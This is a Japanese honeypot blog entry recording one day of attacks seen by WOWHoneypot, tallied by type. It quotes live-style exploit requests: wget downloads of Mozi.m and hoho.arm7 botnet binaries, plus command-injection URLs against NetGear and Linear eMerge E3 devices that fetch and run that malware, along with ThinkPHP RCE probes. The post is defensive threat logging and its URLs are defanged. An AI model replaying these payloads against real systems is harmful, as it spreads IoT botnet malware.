23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(316日目)

2020/01/27(月)

トータルは453件でした。

ハンティングログは以下です。

180.115.36[.]148 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m

www.virustotal.com

222.108.0[.]28 wget+hxxp[:]//222.108.0[.]28:45758/Mozi.m

www.virustotal.com

94.94.226[.]54 wget hxxp[:]//switchnets[.]net/hoho.arm7
221.157.203[.]236 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
362 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
43 アクセス GET /
13 調査 GET /script
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
2 Tomcatの調査 GET /manager/text/list
2 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
2 不正中継の試み CONNECT ip.ws.126.net:443
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 Gponルータの脆弱性を狙った通信 POST /GponForm/diag_Form?images/
1 クローリング HEAD /robots.txt
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 ZmEuによるphpMyAdminのスキャン GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 ZmEuによるphpMyAdminのスキャン GET /pma/scripts/setup.php
1 ZmEuによるphpMyAdminのスキャン GET /phpmyadmin/scripts/setup.php
1 ZmEuによるphpMyAdminのスキャン GET /phpMyAdmin/scripts/setup.php
1 ZmEuによるphpMyAdminのスキャン GET /myadmin/scripts/setup.php
1 ZmEuによるphpMyAdminのスキャン GET /MyAdmin/scripts/setup.php
1 NetGear製品の脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//222.108.0.28:45758/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 調査 GET /requested.html
1 調査 GET /is_test
1 ドメイン間ポリシーファイルの調査 GET /clientaccesspolicy.xml
1 調査 GET /admin/connection/
1 不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443